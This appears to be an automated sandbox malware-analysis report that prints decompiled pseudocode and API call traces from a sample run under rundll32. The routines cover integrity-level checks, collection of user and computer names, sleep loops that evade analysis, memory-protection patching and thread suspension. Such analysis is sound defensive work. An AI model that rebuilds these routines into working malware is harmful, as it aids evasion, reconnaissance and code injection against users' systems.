                                                          										_t49 = E00E550A3(_t79, _t82, _v8); // executed
                                                          										_t84 = _t49;
                                                          										goto L31;
                                                          									}
                                                          									__eflags = _t82;
                                                          									if(__eflags == 0) {
                                                          										goto L31;
                                                          									}
                                                          									_t23 = _t82 + 4; // 0x5
                                                          									_t84 = E00E52A24(__eflags, _t23);
                                                          									__eflags = _t84;
                                                          									if(_t84 == 0) {
                                                          										goto L31;
                                                          									}
                                                          									goto L30;
                                                          								}
                                                          								_t84 = 8;
                                                          							}
                                                          						}
                                                          					} else {
                                                          						_t71 = _v12;
                                                          						if(_t71 == 0) {
                                                          							L31:
                                                          							if(_v20 == 0 || _v20 == 1) {
                                                          								 *0xe5a14c(); // executed
                                                          							}
                                                          							goto L35;
                                                          						}
                                                          						_t72 = _t71 + 4;
                                                          						do {
                                                          							_push(1);
                                                          							_push(_t72);
                                                          							_t67 = 5;
                                                          						} while (E00E5663C(_t67, 0) == 0x4c7);
                                                          					}
                                                          					goto L31;
                                                          				} else {
                                                          					_t84 = _t28;
                                                          					L35:
                                                          					return _t84;
                                                          				}
                                                          			}
                                                          0x00e5435f
                                                          0x00e5436a
                                                          0x00e5436d
                                                          0x00e54370
                                                          0x00e54373
                                                          0x00e5437a
                                                          0x00e5437c
                                                          0x00e54388
                                                          0x00e5438a
                                                          0x00e5438a
                                                          0x00e54393
                                                          0x00e5439b
                                                          0x00e5439e
                                                          0x00e543b8
                                                          0x00e543bd
                                                          0x00e543be
                                                          0x00e543c0
                                                          0x00e543c5
                                                          0x00e543ca
                                                          0x00e543cc
                                                          0x00e543d3
                                                          0x00e543dd
                                                          0x00e543e3
                                                          0x00e543f0
                                                          0x00e543f7
                                                          0x00e543fc

                                                          APIs
                                                            • Part of subcall function 00E569CE: GetModuleHandleA.KERNEL32(4C44544E,00000000,00E54378,00000000,00000000,00000000,?,?,?,?,?,00E568F7,?,00000001), ref: 00E569DD
                                                          • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(4D283A53,00000001,00E5A2FC,00000000), ref: 00E543E3
                                                          • CloseHandle.KERNEL32(?,?,00000001,?,?,?,?,?,?,?,00E568F7,?,00000001), ref: 00E543FC
                                                          • wsprintfA.USER32 ref: 00E5447C
                                                          • memset.NTDLL ref: 00E544AC
                                                          • RtlInitializeCriticalSection.NTDLL(051B95F0), ref: 00E544BD
                                                          • RtlAllocateHeap.NTDLL(00000008,00000052,00000060), ref: 00E544E6
                                                          • wsprintfA.USER32 ref: 00E54516
                                                            • Part of subcall function 00E56CD6: GetUserNameW.ADVAPI32(00000000,;E), ref: 00E56D0D
                                                            • Part of subcall function 00E56CD6: RtlAllocateHeap.NTDLL(00000000,;E), ref: 00E56D24
                                                            • Part of subcall function 00E56CD6: GetUserNameW.ADVAPI32(00000000,;E), ref: 00E56D31
                                                            • Part of subcall function 00E56CD6: HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,00E5453B,?,?,?,?,?,00E568F7,?,00000001), ref: 00E56D52
                                                            • Part of subcall function 00E56CD6: GetComputerNameW.KERNEL32(00000000,00000000), ref: 00E56D79
                                                            • Part of subcall function 00E56CD6: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00E56D8D
                                                            • Part of subcall function 00E56CD6: GetComputerNameW.KERNEL32(00000000,00000000), ref: 00E56D9A
                                                            • Part of subcall function 00E56CD6: HeapFree.KERNEL32(00000000,00000000), ref: 00E56DB8
                                                            • Part of subcall function 00E55FBC: RtlAllocateHeap.NTDLL(00000000,00000000,00E52035), ref: 00E55FC8
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Heap$AllocateName$ComputerDescriptorFreeHandleSecurityUserwsprintf$CloseConvertCriticalInitializeModuleSectionStringmemset
                                                          • String ID:
                                                          • API String ID: 2910951584-0
                                                          • Opcode ID: eaaac5ebec24e12a127d9215d8fd2d1eb9396c09fde11d19661226c9a1ff1087
                                                          • Instruction ID: b7971044e14892713fae16bc89eed619cf2312876bcf8f26fad58706b697ef20
                                                          • Opcode Fuzzy Hash: eaaac5ebec24e12a127d9215d8fd2d1eb9396c09fde11d19661226c9a1ff1087
                                                          • Instruction Fuzzy Hash: F051E0B1900214AFDB24DBA59C46BAE73F8AB0470BF141D25FD04F72A1E7709D8C8B91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 0557623F: VirtualProtect.KERNEL32(?,?,00000040,?), ref: 05576264
                                                            • Part of subcall function 0557623F: GetLastError.KERNEL32 ref: 0557626C
                                                            • Part of subcall function 0557623F: VirtualQuery.KERNEL32(?,?,0000001C), ref: 05576283
                                                            • Part of subcall function 0557623F: VirtualProtect.KERNEL32(?,?,-2C9B417C,?), ref: 055762A8
                                                          • GetLastError.KERNEL32(?,?,00000000,?,05598560,0000001C,0557C114,00000002,?,00000001,?,?,?,00000000,?), ref: 0557E86B
                                                            • Part of subcall function 05591A69: lstrlen.KERNEL32(?,?), ref: 05591AA1
                                                            • Part of subcall function 05591A69: lstrcpy.KERNEL32(00000000,?), ref: 05591AB8
                                                            • Part of subcall function 05591A69: StrChrA.SHLWAPI(00000000,0000002E), ref: 05591AC1
                                                            • Part of subcall function 05591A69: GetModuleHandleA.KERNEL32(00000000), ref: 05591ADF
                                                          • VirtualProtect.KERNEL32(00000000,00000005,00000040,00000040,?,?,?,?,?,?,00000000,?,05598560,0000001C,0557C114,00000002), ref: 0557E7E9
                                                          • VirtualProtect.KERNEL32(?,00000004,?,?,?,?,?,?,00000000,?,05598560,0000001C,0557C114,00000002,?,00000001), ref: 0557E804
                                                          • RtlEnterCriticalSection.NTDLL(0559C300), ref: 0557E828
                                                          • RtlLeaveCriticalSection.NTDLL(0559C300), ref: 0557E846
                                                            • Part of subcall function 0557623F: SetLastError.KERNEL32(?), ref: 055762B1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Virtual$Protect$ErrorLast$CriticalSection$EnterHandleLeaveModuleQuerylstrcpylstrlen
                                                          • String ID:
                                                          • API String ID: 899430048-3916222277
                                                          • Opcode ID: 37cd36d9f2f4e2dc7abf7b76ce1bd3d125755f0cba2091f83a77bbe934cc90af
                                                          • Instruction ID: c9ec858e7df841b20f9d5c1ec8af43b6fd9ff06e9936c8cb122fd26293dc85f4
                                                          • Opcode Fuzzy Hash: 37cd36d9f2f4e2dc7abf7b76ce1bd3d125755f0cba2091f83a77bbe934cc90af
                                                          • Instruction Fuzzy Hash: 4B418B7190070AEFDF14DFA9D849AADBBB9FF48310F04825AE815AB250D734E954CFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          C-Code - Quality: 100%
                                                          			E00E54BAC(signed int _a4, signed int* _a8) {
                                                          				void* __ecx;
                                                          				void* __edi;
                                                          				signed int _t6;
                                                          				intOrPtr _t8;
                                                          				intOrPtr _t12;
                                                          				long _t14;
                                                          				void* _t18;
                                                          				long _t21;
                                                          				void* _t25;
                                                          				void* _t26;
                                                          				signed int* _t27;
                                                          				signed short* _t28;
                                                          				CHAR* _t30;
                                                          				long _t31;
                                                          				WCHAR** _t32;
                                                          
                                                          				_t6 =  *0xe5a2c8; // 0xbd092303
                                                          				_t1 =  &_a4; // 0xe5757a
                                                          				_t32 =  *_t1;
                                                          				_a4 = _t6 ^ 0xd05b5869;
                                                          				_t8 =  *0xe5a2d4; // 0x435d5a8
                                                          				_t3 = _t8 + 0xe5b84d; // 0x61636f4c
                                                          				_t25 = 0;
                                                          				_t30 = E00E53D0E(_t3, 1);
                                                          				if(_t30 != 0) {
                                                          					_t25 = CreateEventA(0xe5a2f8, 1, 0, _t30);
                                                          					E00E513CC(_t30);
                                                          				}
                                                          				_t12 =  *0xe5a2b4; // 0x4000000a
                                                          				if(_t12 != 6 || _t12 < 2) {
                                                          					if( *_t32 == 0) {
                                                          						goto L11;
                                                          					}
                                                          					_t18 = E00E52102(); // executed
                                                          					if(_t18 != 0) {
                                                          						goto L11;
                                                          					}
                                                          					_t28 = StrChrW( *_t32, 0x20);
                                                          					if(_t28 != 0) {
                                                          						 *_t28 =  *_t28 & 0x00000000;
                                                          						_t28 =  &(_t28[1]);
                                                          					}
                                                          					_t21 = E00E5663C(0, _t28,  *_t32, 0); // executed
                                                          					_t31 = _t21;
                                                          					if(_t31 == 0) {
                                                          						if(_t25 == 0) {
                                                          							goto L21;
                                                          						}
                                                          						_t31 = WaitForSingleObject(_t25, 0x4e20);
                                                          						if(_t31 == 0) {
                                                          							goto L19;
                                                          						}
                                                          					}
                                                          					goto L11;
                                                          				} else {
                                                          					L11:
                                                          					_t27 = _a8;
                                                          					if(_t27 != 0) {
                                                          						 *_t27 =  *_t27 | 0x00000001;
                                                          					}
                                                          					_t14 = E00E52F12(_t32, _t26); // executed
                                                          					_t31 = _t14;
                                                          					if(_t31 == 0 && _t25 != 0) {
                                                          						_t31 = WaitForSingleObject(_t25, 0x4e20);
                                                          					}
                                                          					if(_t27 != 0 && _t31 != 0) {
                                                          						 *_t27 =  *_t27 & 0xfffffffe;
                                                          					}
                                                          					L19:
                                                          					if(_t25 != 0) {
                                                          						CloseHandle(_t25);
                                                          					}
                                                          					L21:
                                                          					return _t31;
                                                          				}
                                                          			}

                                                          APIs
                                                            • Part of subcall function 00E53D0E: lstrlen.KERNEL32(E8FA7DD7,00000000,69B25F44,00000027,00000000,051B9CD0,74ECC740,KE,?,69B25F44,E8FA7DD7,00000000,?,?,?,00E5454B), ref: 00E53D44
                                                            • Part of subcall function 00E53D0E: lstrcpy.KERNEL32(00000000,00000000), ref: 00E53D68
                                                            • Part of subcall function 00E53D0E: lstrcat.KERNEL32(00000000,00000000), ref: 00E53D70
                                                          • CreateEventA.KERNEL32(00E5A2F8,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,00E5757A,?,?,?), ref: 00E54BEB
                                                            • Part of subcall function 00E513CC: RtlFreeHeap.NTDLL(00000000,00000000,00E520F3,00000000,00000000,?,00000000,?,?,?,?,?,00E568A9,00000000,?,00000001), ref: 00E513D8
                                                          • StrChrW.SHLWAPI(zu,00000020,61636F4C,00000001,00000000,?,?,00000000,?,00E5757A,?,?,?), ref: 00E54C1B
                                                          • WaitForSingleObject.KERNEL32(00000000,00004E20,zu,00000000,?,00000000,?,00E5757A,?,?,?,?,?,?,yE,00E5519C), ref: 00E54C49
                                                          • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,00E5757A,?,?,?), ref: 00E54C77
                                                          • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,00E5757A,?,?,?,?,?,?,yE), ref: 00E54C8F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                                                          • String ID: zu
                                                          • API String ID: 73268831-1569895686
                                                          • Opcode ID: a4410e6cf59d285b2dcb9e20ce494a8f1de10656b68f3fc8c972c2e68731ebd3
                                                          • Instruction ID: c9c4d37c03c0411b535eb6faecb02f717af93889de1f3ed2c959d8e32ec3a29c
                                                          • Opcode Fuzzy Hash: a4410e6cf59d285b2dcb9e20ce494a8f1de10656b68f3fc8c972c2e68731ebd3
                                                          • Instruction Fuzzy Hash: 8A210AB25023125BE7214B699C45B5AB3E8AF9475FF052E24FE06BB2D1D770CC4C4640
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 0558F841: memset.NTDLL ref: 0558F84B
                                                          • OpenEventA.KERNEL32(00000002,00000000,0559C1E4,7519F560,00000000,?,?,0558D3D0), ref: 05571F01
                                                          • SetEvent.KERNEL32(00000000,?,?,0558D3D0), ref: 05571F0E
                                                          • Sleep.KERNEL32(00000BB8,?,?,0558D3D0), ref: 05571F19
                                                          • ResetEvent.KERNEL32(00000000,?,?,0558D3D0), ref: 05571F20
                                                          • CloseHandle.KERNEL32(00000000,?,?,0558D3D0), ref: 05571F27
                                                          • GetShellWindow.USER32 ref: 05571F32
                                                          • GetWindowThreadProcessId.USER32(00000000), ref: 05571F39
                                                            • Part of subcall function 05579005: RegCloseKey.ADVAPI32(?), ref: 05579088
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Event$CloseWindow$HandleOpenProcessResetShellSleepThreadmemset
                                                          • String ID:
                                                          • API String ID: 53838381-0
                                                          • Opcode ID: b6c51602b7ff06ce6c0c2c3a095302c63995f5da22f713d2bc26636c85fa88d6
                                                          • Instruction ID: 9f113a902b44f5224967e2c2afadab82250780362ac00c694fd594898556e80f
                                                          • Opcode Fuzzy Hash: b6c51602b7ff06ce6c0c2c3a095302c63995f5da22f713d2bc26636c85fa88d6
                                                          • Instruction Fuzzy Hash: 3C21A132214509BBC2116B66BC8EE2B7F6DFBCA660B064106F51AD7140DF395808FB75
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E00E55FD1(long* _a4) {
                                                          				long _v8;
                                                          				void* _v12;
                                                          				void _v16;
                                                          				long _v20;
                                                          				int _t33;
                                                          				void* _t46;
                                                          
                                                          				_v16 = 1;
                                                          				_v20 = 0x2000;
                                                          				if( *0xe5a2b4 > 5) {
                                                          					_v16 = 0;
                                                          					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
                                                          						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
                                                          						_v8 = 0;
                                                          						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
                                                          						if(_v8 != 0) {
                                                          							_t46 = E00E55FBC(_v8);
                                                          							if(_t46 != 0) {
                                                          								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
                                                          								if(_t33 != 0) {
                                                          									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
                                                          								}
                                                          								E00E513CC(_t46);
                                                          							}
                                                          						}
                                                          						CloseHandle(_v12);
                                                          					}
                                                          				}
                                                          				 *_a4 = _v20;
                                                          				return _v16;
                                                          			}


                                                          APIs
                                                          • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 00E56003
                                                          • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,00000000,00000000), ref: 00E56023
                                                          • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,00000000), ref: 00E56033
                                                          • CloseHandle.KERNEL32(00000000), ref: 00E56083
                                                            • Part of subcall function 00E55FBC: RtlAllocateHeap.NTDLL(00000000,00000000,00E52035), ref: 00E55FC8
                                                          • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,00000000,00000000,?), ref: 00E56056
                                                          • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 00E5605E
                                                          • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 00E5606E
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                                                          • String ID:
                                                          • API String ID: 1295030180-0
                                                          • Opcode ID: f55ae9680112d762c14acb1afa8cf14b4c86d98d3c0e932af110ef85f3b8fe63
                                                          • Instruction ID: 4db27d8f20a8878ec85a73aaa19e8d619bab22b1167ac4e359f1d310edc56bc1
                                                          • Opcode Fuzzy Hash: f55ae9680112d762c14acb1afa8cf14b4c86d98d3c0e932af110ef85f3b8fe63
                                                          • Instruction Fuzzy Hash: A5215C75900219FFEB109F91CC44EAEBBB8EB04305F0045A5F911B72A1C7714E08EB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 73%
                                                          			E00E5682B(signed int __edx, intOrPtr _a4) {
                                                          				struct _FILETIME _v12;
                                                          				char _v32;
                                                          				long _v40;
                                                          				void* _t14;
                                                          				void* _t16;
                                                          				int _t18;
                                                          				signed int _t20;
                                                          				void* _t22;
                                                          				signed int _t23;
                                                          				intOrPtr _t25;
                                                          				unsigned int _t29;
                                                          				signed int _t34;
                                                          				signed int _t41;
                                                          
                                                          				_t34 = __edx;
                                                          				_t14 = HeapCreate(0, 0x400000, 0); // executed
                                                          				 *0xe5a290 = _t14;
                                                          				if(_t14 != 0) {
                                                          					 *0xe5a180 = GetTickCount();
                                                          					_t16 = E00E51DFA(_a4);
                                                          					if(_t16 != 0) {
                                                          						L10:
                                                          						return _t16;
                                                          					} else {
                                                          						goto L3;
                                                          					}
                                                          					do {
                                                          						L3:
                                                          						GetSystemTimeAsFileTime( &_v12);
                                                          						_t18 = SwitchToThread();
                                                          						_t29 = _v12.dwHighDateTime;
                                                          						_t20 = (_t29 << 0x00000020 | _v12.dwLowDateTime) >> 5;
                                                          						_push(0);
                                                          						_push(0x13);
                                                          						_push(_t29 >> 5);
                                                          						_push(_t20);
                                                          						L00E57F3A();
                                                          						_t41 = _t18 + _t20;
                                                          						_t22 = E00E51FE8(_a4, _t41);
                                                          						_t23 = 3;
                                                          						Sleep(_t23 << (_t41 & 0x00000007)); // executed
                                                          					} while (_t22 == 1);
                                                          					_t25 =  *0xe5a2ac; // 0x2f0
                                                          					_v32 = 0;
                                                          					if(_t25 != 0) {
                                                          						__imp__(_t25,  &_v32);
                                                          						if(_t25 == 0) {
                                                          							_v40 = 0;
                                                          						}
                                                          						if(_v40 != 0) {
                                                          							 *0xe5a2b8 = 1; // executed
                                                          						}
                                                          					}
                                                          					_t16 = E00E5435F(_t34); // executed
                                                          					goto L10;
                                                          				}
                                                          				_t16 = 8;
                                                          				goto L10;
                                                          			}


                                                          APIs
                                                          • HeapCreate.KERNEL32(00000000,00400000,00000000,?,00000001), ref: 00E56840
                                                          • GetTickCount.KERNEL32 ref: 00E56857
                                                          • GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001), ref: 00E56877
                                                          • SwitchToThread.KERNEL32(?,00000001), ref: 00E5687D
                                                          • _aullrem.NTDLL(?,?,00000013,00000000), ref: 00E56899
                                                          • Sleep.KERNEL32(00000003,00000000,?,00000001), ref: 00E568B6
                                                          • IsWow64Process.KERNEL32(000002F0,?,?,00000001), ref: 00E568D4
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Time$CountCreateFileHeapProcessSleepSwitchSystemThreadTickWow64_aullrem
                                                          • String ID:
                                                          • API String ID: 3690864001-0
                                                          • Opcode ID: f77edacebe2275d8903b3f79b218f7abd61c624e4d607e3fbd387e4951f47209
                                                          • Instruction ID: ad70f9ff9386bd87467399ce29ddb1661147c280a97d4da382d9c44c2dae6117
                                                          • Opcode Fuzzy Hash: f77edacebe2275d8903b3f79b218f7abd61c624e4d607e3fbd387e4951f47209
                                                          • Instruction Fuzzy Hash: 3021F3B2A00304AFD718AFA5EC89A9A77E8A744357F444D3DF905E3190E774C84C8B61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 64%
                                                          			E00E57156(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                          				intOrPtr _v8;
                                                          				intOrPtr _t9;
                                                          				intOrPtr _t13;
                                                          				char* _t19;
                                                          				char* _t28;
                                                          				void* _t33;
                                                          				void* _t34;
                                                          				char* _t36;
                                                          				void* _t38;
                                                          				intOrPtr* _t39;
                                                          				char* _t40;
                                                          				char* _t42;
                                                          				char* _t43;
                                                          
                                                          				_t34 = __edx;
                                                          				_push(__ecx);
                                                          				_t9 =  *0xe5a2d4; // 0x435d5a8
                                                          				_t1 = _t9 + 0xe5b61b; // 0x253d7325
                                                          				_t36 = 0;
                                                          				_t28 = E00E53420(__ecx, _t1);
                                                          				if(_t28 != 0) {
                                                          					_t39 = __imp__;
                                                          					_t13 =  *_t39(_t28, _t38);
                                                          					_v8 = _t13;
                                                          					_t6 =  *_t39(_a4) + 1; // 0x51b9631
                                                          					_t40 = E00E55FBC(_v8 + _t6);
                                                          					if(_t40 != 0) {
                                                          						strcpy(_t40, _t28);
                                                          						_pop(_t33);
                                                          						__imp__(_t40, _a4);
                                                          						_t19 = E00E56E5D(_t33, _t34, _t40, _a8); // executed
                                                          						_t36 = _t19;
                                                          						E00E513CC(_t40);
                                                          						_t42 = E00E5216C(StrTrimA(_t36, "="), _t36);
                                                          						if(_t42 != 0) {
                                                          							E00E513CC(_t36);
                                                          							_t36 = _t42;
                                                          						}
                                                          						_t43 = E00E54FE5(_t36, _t33);
                                                          						if(_t43 != 0) {
                                                          							E00E513CC(_t36);
                                                          							_t36 = _t43;
                                                          						}
                                                          					}
                                                          					E00E513CC(_t28);
                                                          				}
                                                          				return _t36;
                                                          			}


                                                          APIs
                                                            • Part of subcall function 00E53420: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00E5716F,253D7325,00000000,00000000,?,00000000,00E54A9F), ref: 00E53487
                                                            • Part of subcall function 00E53420: sprintf.NTDLL ref: 00E534A8
                                                          • lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,00000000,00E54A9F,00000000,051B9630), ref: 00E57181
                                                          • lstrlen.KERNEL32(00000000,?,00000000,00E54A9F,00000000,051B9630), ref: 00E57189
                                                            • Part of subcall function 00E55FBC: RtlAllocateHeap.NTDLL(00000000,00000000,00E52035), ref: 00E55FC8
                                                          • strcpy.NTDLL ref: 00E571A0
                                                          • lstrcat.KERNEL32(00000000,00000000), ref: 00E571AB
                                                            • Part of subcall function 00E56E5D: lstrlen.KERNEL32(00000000,00000000,00E54A9F,00000000,?,00E571BA,00000000,00E54A9F,?,00000000,00E54A9F,00000000,051B9630), ref: 00E56E6E
                                                            • Part of subcall function 00E513CC: RtlFreeHeap.NTDLL(00000000,00000000,00E520F3,00000000,00000000,?,00000000,?,?,?,?,?,00E568A9,00000000,?,00000001), ref: 00E513D8
                                                          • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,00E54A9F,?,00000000,00E54A9F,00000000,051B9630), ref: 00E571C8
                                                            • Part of subcall function 00E5216C: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,00E571D4,00000000,?,00000000,00E54A9F,00000000,051B9630), ref: 00E52176
                                                            • Part of subcall function 00E5216C: _snprintf.NTDLL ref: 00E521D4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                                          • String ID: =
                                                          • API String ID: 2864389247-1428090586
                                                          • Opcode ID: 4a63844f34605484e09c1555bcac503648e5e4c3855772f30cdc3a18ef03d83a
                                                          • Instruction ID: 5979d70734f024a231cf01af3f0e77ec0e77c67ae8b956a4788e89ea65c8285f
                                                          • Opcode Fuzzy Hash: 4a63844f34605484e09c1555bcac503648e5e4c3855772f30cdc3a18ef03d83a
                                                          • Instruction Fuzzy Hash: 9011E3375026267B47126BB49C45CAF37DD9F4575A7053C65FE00B7212CE34CD0987A4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • memset.NTDLL ref: 0558F0D9
                                                            • Part of subcall function 055724A8: OpenProcess.KERNEL32(00000400,00000000,?), ref: 055724C3
                                                            • Part of subcall function 055724A8: IsWow64Process.KERNEL32(?,?), ref: 055724D4
                                                            • Part of subcall function 055724A8: CloseHandle.KERNEL32(?,?,?), ref: 055724E7
                                                          • ResumeThread.KERNEL32(?,?,00000000,00000000,00000004,?,00000000,75144EE0,00000000), ref: 0558F193
                                                          • WaitForSingleObject.KERNEL32(00000064), ref: 0558F1A1
                                                          • SuspendThread.KERNEL32(?), ref: 0558F1B4
                                                            • Part of subcall function 055737F6: memset.NTDLL ref: 05573AB7
                                                          • ResumeThread.KERNEL32(?), ref: 0558F237
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Thread$ProcessResumememset$CloseHandleObjectOpenSingleSuspendWaitWow64
                                                          • String ID:
                                                          • API String ID: 568453049-0
                                                          • Opcode ID: 1f2d00031cfff9b284e120b84af662434745c3d85cdbfe3779be4f5c2b9a8078
                                                          • Instruction ID: 86369fa7566815df32c68a6022754f790c7adf1e55df025be3e71f01a77d78b1
                                                          • Opcode Fuzzy Hash: 1f2d00031cfff9b284e120b84af662434745c3d85cdbfe3779be4f5c2b9a8078
                                                          • Instruction Fuzzy Hash: 3A419E76A00209ABDF11EFA4DC88EBEBBBAFF48350F144466F906A2150D735EA55DB10
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00E53686: IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,051B89D0,00E54DD1,?,?,?,?,?,?,?,?,?,?,?,00E54DD1), ref: 00E53752
                                                            • Part of subcall function 00E56566: IUnknown_QueryInterface_Proxy.RPCRT4(?,E7A1AF80,?), ref: 00E565A3
                                                            • Part of subcall function 00E56566: IUnknown_QueryInterface_Proxy.RPCRT4(?,A4C6892C,?), ref: 00E565D4
                                                          • SysAllocString.OLEAUT32(?), ref: 00E54DFD
                                                          • SysAllocString.OLEAUT32(0070006F), ref: 00E54E11
                                                          • SysAllocString.OLEAUT32(00000000), ref: 00E54E23
                                                          • SysFreeString.OLEAUT32(00000000), ref: 00E54E87
                                                          • SysFreeString.OLEAUT32(00000000), ref: 00E54E96
                                                          • SysFreeString.OLEAUT32(00000000), ref: 00E54EA1
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: String$AllocFreeQueryUnknown_$Interface_Proxy$Service
                                                          • String ID:
                                                          • API String ID: 2831207796-0
